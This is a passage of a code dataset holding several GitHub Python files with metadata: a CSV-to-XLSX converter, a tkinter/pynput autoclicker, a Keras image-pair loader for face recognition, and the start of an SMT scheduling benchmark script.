"dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 16, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 18, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 18, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR100", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR100", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.DistributedSampler", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "34688864372", "text": "import argparse\nimport csv\nimport datetime\nimport sys\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom openpyxl import Workbook\nfrom openpyxl.cell.cell import column_index_from_string\nfrom openpyxl.styles import Style, Font, numbers\nfrom openpyxl.writer.dump_worksheet import DumpWorksheet\nfrom openpyxl.xml.functions import XMLGenerator, start_tag, end_tag, tag\n\n\nclass CSV2XLSX(object):\n \"\"\"\n Converts CSV from stdin into XLSX to stdout. Also optionally converts columns to integers\n or datetimes and adjusts column widths.\n \"\"\"\n def __init__(self):\n self.args = self.parse_args()\n\n self.integer_cols = [column_index_from_string(c)-1 for c in self.args.integer_cols.split(',')]\\\n if self.args.integer_cols else []\n\n def datetime_spec_parse(arg_tuple):\n str_col, in_format, out_format = arg_tuple.split(';', 2)\n out_cell = {'style': Style(number_format=numbers.NumberFormat(format_code=out_format))}\n return column_index_from_string(str_col)-1, (in_format, out_cell)\n\n self.datetime_spec_dict = dict(datetime_spec_parse(a) for a in self.args.datetime_spec or ())\n\n self.HEADER_STYLE = Style(font=Font(bold=True))\n self.strptime = datetime.datetime.strptime\n\n def convert(self, infile, outfile):\n WidthsDumpWorksheet.col_widths = {}\n\n for width_spec in self.args.col_width or ():\n col, width = width_spec.split(',', 1)\n if '-' in col:\n col_lo, col_hi = map(column_index_from_string, col.split('-', 1))\n else:\n col_lo = col_hi = column_index_from_string(col)\n\n WidthsDumpWorksheet.col_widths[(col_lo, col_hi)] = width\n\n # TODO: This will be used when we switch to openpyxl 2.1.\n #Workbook._optimized_worksheet_class = WidthsDumpWorksheet\n\n wb = Workbook(optimized_write=True, optimized_worksheet_class=WidthsDumpWorksheet)\n\n ws = wb.create_sheet(title=self.args.sheet_name)\n\n for row in self.iter_rows(self.get_reader(infile)):\n ws.append(row)\n\n wb.save(outfile)\n\n # Clean up the mess.\n WidthsDumpWorksheet.col_widths = {}\n\n def get_reader(self, infile):\n return csv.reader(infile, delimiter=self.args.delimiter, quotechar=self.args.quotechar)\n\n def iter_rows(self, reader):\n for unused in range(self.args.header_rows):\n yield [{'value': cell.decode(self.args.input_encoding), 'style': self.HEADER_STYLE}\n for cell in reader.next()]\n\n for row in reader:\n row = [cell.decode(self.args.input_encoding) for cell in row]\n\n for col in self.integer_cols:\n if row[col]:\n row[col] = int(row[col])\n\n for col, (input_format, out_cell) in self.datetime_spec_dict.items():\n if row[col]:\n out_cell['value'] = self.strptime(row[col], input_format)\n row[col] = out_cell\n\n yield row\n\n def parse_args(self):\n p = argparse.ArgumentParser(description=self.__doc__)\n p.add_argument(\"input_encoding\", help=\"The character encoding of the input CSV.\")\n p.add_argument(\"sheet_name\", help=\"The name to put on the single sheet.\")\n\n p.add_argument(\"--delimiter\", \"-d\", default=';',\n help=\"Cell delimiter in the input. Default: semicolon (;)\")\n p.add_argument(\"--quotechar\", \"-q\", default='\"',\n help=\"Quoting character in the input. Default: double quote (\\\")\")\n p.add_argument(\"--header-rows\", \"-H\", type=int, default=0, metavar=\"NUMBER\",\n help=\"The number of leading rows to just pass with bold style \"\n \"without any type conversions. Default: 0\")\n\n p.add_argument(\"--integer-cols\", \"-i\", metavar='COLUMNS',\n help=\"Comma-delimited list of columns whose values should be converted \"\n \"to integer. Example: -iA,G,AA\")\n p.add_argument(\"--datetime-spec\", \"-t\", action='append', metavar=\"COLUMN;I-FORMAT;O-FORMAT\",\n help=\"Points to one of the columns that should be treated as date, time \"\n \"or datetime value. Semicolon-delimited tuple of column, \"\n \"input datetime format and output custom datetime format. \"\n \"Example: -t\\\"C;%%d.%%m.%%Y %%H:%%M;dd.mm.yyyy hh:mm\\\"\")\n\n p.add_argument(\"--col-width\", \"-w\", action='append', metavar=\"COLUMN,WIDTH\",\n help=\"Specifies the width for given column or column range. \"\n \"Example: -wA,20 -wO-R,30\")\n return p.parse_args()\n\n\n# TODO: This will be used when we switch to openpyxl 2.1.\n# class WidthsDumpWorksheet(DumpWorksheet):\n# \"\"\"\n# This is a hack to get the ... element to optimized writer by force.\n# \"\"\"\n# def write_header(self):\n# doc = super(WidthsDumpWorksheet, self).write_header()\n#\n# start_tag(doc, 'cols')\n# for (col_lo, col_hi), width in self.col_widths.items():\n# tag(doc, 'col', dict(min=str(col_lo), max=str(col_hi), width=width, customWidth=\"1\"))\n# end_tag(doc, 'cols')\n#\n# return doc\n\n\nclass WidthsDumpWorksheet(DumpWorksheet):\n \"\"\"\n This is a hack to get the ... element to optimized writer by force.\n \"\"\"\n def write_header(self):\n\n fobj = self.get_temporary_file(filename=self._fileobj_header_name)\n doc = XMLGenerator(fobj)\n\n start_tag(doc, 'worksheet',\n {\n 'xmlns': 'http://schemas.openxmlformats.org/spreadsheetml/2006/main',\n 'xmlns:r': 'http://schemas.openxmlformats.org/officeDocument/2006/relationships'})\n start_tag(doc, 'sheetPr')\n tag(doc, 'outlinePr',\n {'summaryBelow': '1',\n 'summaryRight': '1'})\n end_tag(doc, 'sheetPr')\n tag(doc, 'dimension', {'ref': 'A1:%s' % (self.get_dimensions())})\n start_tag(doc, 'sheetViews')\n start_tag(doc, 'sheetView', {'workbookViewId': '0'})\n tag(doc, 'selection', {'activeCell': 'A1',\n 'sqref': 'A1'})\n end_tag(doc, 'sheetView')\n end_tag(doc, 'sheetViews')\n tag(doc, 'sheetFormatPr', {'defaultRowHeight': '15'})\n\n # START csv2xlsx\n start_tag(doc, 'cols')\n for (col_lo, col_hi), width in self.col_widths.items():\n tag(doc, 'col', dict(min=str(col_lo), max=str(col_hi), width=width, customWidth=\"1\"))\n end_tag(doc, 'cols')\n # END csv2xlsx\n\n start_tag(doc, 'sheetData')\n\n\ndef main():\n output = StringIO()\n\n CSV2XLSX().convert(sys.stdin, output)\n\n sys.stdout.write(output.getvalue())\n", "repo_name": "impercz/csv2xlsx", "sub_path": "csv2xlsx.py", "file_name": "csv2xlsx.py", "file_ext": "py", "file_size_in_byte": 6883, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 26, "usage_type": "call"}, {"api_name": "openpyxl.styles.Style", "line_number": 31, "usage_type": "call"}, {"api_name": "openpyxl.styles.numbers.NumberFormat", "line_number": 31, "usage_type": "call"}, {"api_name": "openpyxl.styles.numbers", "line_number": 31, "usage_type": "name"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 32, "usage_type": "call"}, {"api_name": "openpyxl.styles.Style", "line_number": 36, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "attribute"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 45, "usage_type": "argument"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 47, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 54, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 67, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "openpyxl.writer.dump_worksheet.DumpWorksheet", "line_number": 132, "usage_type": "name"}, {"api_name": "openpyxl.xml.functions.XMLGenerator", "line_number": 139, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 141, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 145, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 146, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 149, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 151, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 152, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 153, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 155, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 156, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 157, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 160, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 162, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 163, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 166, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 170, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 172, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 174, "usage_type": "attribute"}]} +{"seq_id": "99539726", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nfrom pynput import keyboard\nfrom pynput.mouse import Button, Controller\nfrom pynput.keyboard import KeyCode\n\n\nclass AutoClicker:\n\n mouse_button_list = {\n 0: Button.left,\n 1: Button.middle,\n 2: Button.right\n }\n\n key_list = {\n 0: keyboard.KeyCode(char='f'),\n 1: keyboard.Key.f2,\n 2: keyboard.Key.f3,\n 3: keyboard.Key.f4,\n 4: keyboard.Key.f5,\n 5: keyboard.Key.f6,\n 6: keyboard.Key.f7,\n 7: keyboard.Key.f8,\n 8: keyboard.Key.f9,\n 9: keyboard.Key.f10,\n 10: keyboard.Key.f11,\n 11: keyboard.KeyCode(char='f')\n }\n\n # Default values\n break_loop = True\n time_interval = 1.0\n user_defined_mouse_button = Button.left\n user_defined_start = keyboard.Key.f1\n user_defined_stop = keyboard.Key.f2\n start_stop_key = KeyCode(char='f')\n user_defined_end = keyboard.Key.f3\n\n def __init__(self, master):\n self.master = master\n master.title(\"Autoclicker\")\n\n # Width x Height\n master.geometry(\"300x350\")\n\n self.time_frame = tk.Frame(master)\n self.time_frame.pack()\n\n self.shortcut_frame = tk.Frame(master)\n self.shortcut_frame.pack()\n\n self.top_frame = tk.Frame(master)\n self.top_frame.pack()\n\n self.mouse_button_frame = tk.Frame(master)\n self.mouse_button_frame.pack()\n\n self.middle_frame = tk.Frame(master)\n self.middle_frame.pack()\n\n self.bottom_frame = tk.Frame(master)\n self.bottom_frame.pack()\n\n self.label_time = ttk.Label(\n self.time_frame, text=\"Time between clicks (seconds)\")\n self.label_time.grid(column=1, row=0)\n\n self.label_shortcut = ttk.Label(\n self.shortcut_frame, text=\"Start shortcut key\")\n self.label_shortcut.grid(column=1, row=0)\n\n self.label_mouse_button = ttk.Label(\n self.mouse_button_frame, text=\"Mouse button to click\")\n self.label_mouse_button.grid(column=1, row=0)\n\n self.label_start = ttk.Label(self.top_frame, text=\"Key press to activate clicking\")\n self.label_start.grid(column=1, row=0)\n\n self.label_stop = ttk.Label(self.middle_frame, text=\"Stop shortcut key\")\n self.label_stop.grid(column=1, row=0)\n\n self.label_end = ttk.Label(self.bottom_frame, text=\"End shortcut key\")\n self.label_end.grid(column=1, row=0)\n\n self.time_string = tk.StringVar()\n self.time_string.set(\"0.15\")\n tk.Entry(self.time_frame, textvariable=self.time_string,\n width=8).grid(column=1, row=1)\n\n self.shortcut_string = tk.StringVar()\n self.shortcut_string.set(\"f\")\n tk.Entry(self.shortcut_frame, textvariable=self.shortcut_string,\n width=8).grid(column=1, row=1)\n\n self.mouse_button_index = ttk.Combobox(\n self.mouse_button_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.mouse_button_index['values'] = (\n Button.left, Button.middle, Button.right)\n self.mouse_button_index.grid(column=1, row=1)\n self.mouse_button_index.current(0)\n\n self.key_start_index = ttk.Combobox(\n self.top_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_start_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_start_index.grid(column=1, row=1)\n self.key_start_index.current(0)\n\n self.key_stop_index = ttk.Combobox(\n self.middle_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_stop_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_stop_index.grid(column=1, row=1)\n self.key_stop_index.current(1)\n\n self.key_end_index = ttk.Combobox(\n self.bottom_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_end_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_end_index.grid(column=1, row=1)\n self.key_end_index.current(2)\n\n # ttk.Button(self.time_frame, text=\"Apply\",\n # command=self.set_time).grid(column=2, row=1)\n # ttk.Button(self.mouse_button_frame, text=\"Apply\",\n # command=self.set_mouse_button).grid(column=2, row=1)\n # ttk.Button(self.top_frame, text=\"Apply\",\n # command=self.key_list_start).grid(column=2, row=1)\n # ttk.Button(self.middle_frame, text=\"Apply\",\n # command=self.key_list_stop).grid(column=2, row=1)\n # ttk.Button(self.bottom_frame, text=\"Apply\",\n # command=self.key_list_end).grid(column=2, row=1)\n\n # TODO: Change key_list_end to apply function that sets all fields\n ttk.Button(self.bottom_frame, text=\"Apply\",\n command=self.key_list_end).grid(column=1, row=2)\n\n self.mouse = Controller()\n\n self.key_listener = keyboard.Listener(on_press=self.on_press)\n self.key_listener.start()\n\n def click_loop(self):\n if self.break_loop == False:\n self.mouse.press(self.user_defined_mouse_button)\n self.mouse.release(self.user_defined_mouse_button)\n self.master.after(int(self.time_interval * 1000), self.click_loop)\n\n def on_press(self, key):\n if key == self.user_defined_start and self.break_loop:\n self.break_loop = False\n self.click_loop()\n if key == self.user_defined_stop and self.break_loop == False:\n self.break_loop = True\n if key == self.user_defined_end:\n self.master.destroy()\n\n def set_time(self):\n try:\n if float(self.time_string.get()) <= 0:\n return\n self.time_interval = float(self.time_string.get())\n except:\n return\n self.label_time.config(text=\"Time interval : \" +\n self.time_string.get() + \"(s)\")\n\n def set_mouse_button(self):\n self.user_defined_mouse_button = self.mouse_button_list.get(\n self.mouse_button_index.current(), None)\n self.label_mouse_button.config(\n text=\"Mouse button : \" + str(self.user_defined_mouse_button).replace('Button.', '').title())\n\n def key_list_start(self):\n temp_key = self.user_defined_start\n self.label_start.config(text=\"Start key : F\" +\n str(self.key_start_index.current() + 1))\n self.user_defined_start = self.key_list.get(\n self.key_start_index.current(), None)\n if self.user_defined_start == self.user_defined_stop or self.user_defined_start == self.user_defined_end:\n if self.user_defined_start == self.user_defined_stop:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_stop.config(text=\"Stop key : F\" + num)\n self.key_stop_index.current(int(num) - 1)\n self.user_defined_stop = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_end.config(text=\"End key : F\" + num)\n self.key_end_index.current(int(num) - 1)\n self.user_defined_end = temp_key\n\n def key_list_stop(self):\n temp_key = self.user_defined_stop\n self.label_stop.config(text=\"Stop key : F\" +\n str(self.key_stop_index.current() + 1))\n self.user_defined_stop = self.key_list.get(\n self.key_stop_index.current(), None)\n if self.user_defined_stop == self.user_defined_start or self.user_defined_stop == self.user_defined_end:\n if self.user_defined_stop == self.user_defined_start:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_start.config(text=\"Start key : F\" + num)\n self.key_start_index.current(int(num) - 1)\n self.user_defined_start = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_end.config(text=\"End key : F\" + num)\n self.key_end_index.current(int(num) - 1)\n self.user_defined_end = temp_key\n\n def key_list_end(self):\n temp_key = self.user_defined_end\n self.label_end.config(text=\"End key : F\" +\n str(self.key_end_index.current() + 1))\n self.user_defined_end = self.key_list.get(\n self.key_end_index.current(), None)\n if self.user_defined_end == self.user_defined_start or self.user_defined_end == self.user_defined_stop:\n if self.user_defined_end == self.user_defined_start:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_start.config(text=\"Start key : F\" + num)\n self.key_start_index.current(int(num) - 1)\n self.user_defined_start = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_stop.config(text=\"Stop key : F\" + num)\n self.key_stop_index.current(int(num) - 1)\n self.user_defined_stop = temp_key\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n AutoClicker(root)\n root.mainloop()\n", "repo_name": "virejdasani/FunctionalAutoclicker", "sub_path": "app/autoclicker.py", "file_name": "autoclicker.py", "file_ext": "py", "file_size_in_byte": 9957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pynput.mouse.Button.left", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 11, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.middle", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 12, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.right", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 13, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 17, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 17, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 18, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 19, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 20, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 21, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 22, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 23, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 25, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 26, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 28, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 28, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.left", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 34, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 35, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 36, "usage_type": "name"}, {"api_name": "pynput.keyboard.KeyCode", "line_number": 37, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 38, "usage_type": "name"}, {"api_name": "tkinter.Frame", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 59, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 65, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 69, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 69, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 73, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 83, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 93, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 96, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 96, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 97, "usage_type": "call"}, {"api_name": "pynput.mouse.Button.left", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", "line_number": 99, "usage_type": "name"}, {"api_name": "pynput.mouse.Button.middle", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button.right", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 104, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 105, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 106, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 110, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 110, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 111, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 112, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 117, "usage_type": "name"}, {"api_name": "tkinter.StringVar", "line_number": 118, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 119, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 120, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 136, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 136, "usage_type": "name"}, {"api_name": "pynput.mouse.Controller", "line_number": 139, "usage_type": "call"}, {"api_name": "pynput.keyboard.Listener", "line_number": 141, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "4641233439", "text": "\nimport numpy as np\n\nimport tensorflow as tf\n\nimport keras\n\ntraining_dir = \"./clean_data\"\ntesting_dir = \"./test\"\nbatch_size = 400\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom random import randint\nfrom collections import Counter\n\n\ndef data(num_of_images=40,width=105,height=105):\n\n train_datagen = ImageDataGenerator(rescale=1./255,shear_range=0.2, zoom_range=0.2,horizontal_flip=True)\n\n train_generator = train_datagen.flow_from_directory(training_dir, target_size=(width,height),batch_size=batch_size, class_mode='binary',shuffle=False)\n\n train = train_generator.next()\n\n train_x,train_y = train[0],train[1]\n \n if(num_of_images>batch_size):\n exit()\n\n train_left_input = np.zeros((num_of_images//2,width,height,3))\n train_right_input = np.zeros((num_of_images//2,width,height,3))\n train_output = np.zeros(num_of_images//2,)\n \n for i in range(num_of_images//2):\n train_left_input[i] = train_x[(((i%40)*10)+randint(0,9))%400]\n \n if randint(0,1):\n train_right_input[i] = train_x[(((i%40)*10)+20)%400]\n train_output[i] = 0\n else:\n train_right_input[i] = train_x[(((i%40)*10)+randint(0,9))%400]\n train_output[i] = 1\n\n print(Counter(train_output))\n return train_left_input,train_right_input,train_output\n\nfrom collections import Counter\n", "repo_name": "aniketbiprojit/face-recognition-one-shot-keras-old", "sub_path": "load_data.py", "file_name": "load_data.py", "file_ext": "py", "file_size_in_byte": 1389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "7622025065", "text": "\"\"\"\nAuthor: Chuanyu (skewcy@gmail.com)\nsmt_wa.py (c) 2023\nDesc: description\nCreated: 2023-10-11T01:17:57.050Z\n\"\"\"\n\nfrom typing import Dict\nfrom .. import utils\nimport z3 # type: ignore\n\nVarDict = Dict[utils.Stream, Dict[utils.Link, Dict[str, z3.ArithRef]]]\n\n\ndef benchmark(\n name, task_path, net_path, output_path=\"./\", workers=1\n) -> utils.Statistics:\n stat = utils.Statistics(name) ## Init empty stat\n try:\n ## Change _Method to your method class\n test = smt_wa(workers) # type: ignore\n test.init(task_path, net_path)\n test.prepare()\n stat = test.solve() ## Update stat\n if stat.result == utils.Result.schedulable:\n test.output().to_csv(name, output_path)\n stat.content(name=name)\n return stat\n except KeyboardInterrupt:\n stat.content(name=name)\n return stat\n except Exception as e:\n print(\"[!]\", e, flush=True)\n stat.result = utils.Result.error\n stat.content(name=name)\n return stat\n\n\nclass smt_wa:\n def __init__(self, workers=1) -> None:\n self.workers = workers\n\n def init(self, task_path, net_path) -> None:\n self.task = utils.load_stream(task_path)\n self.net = 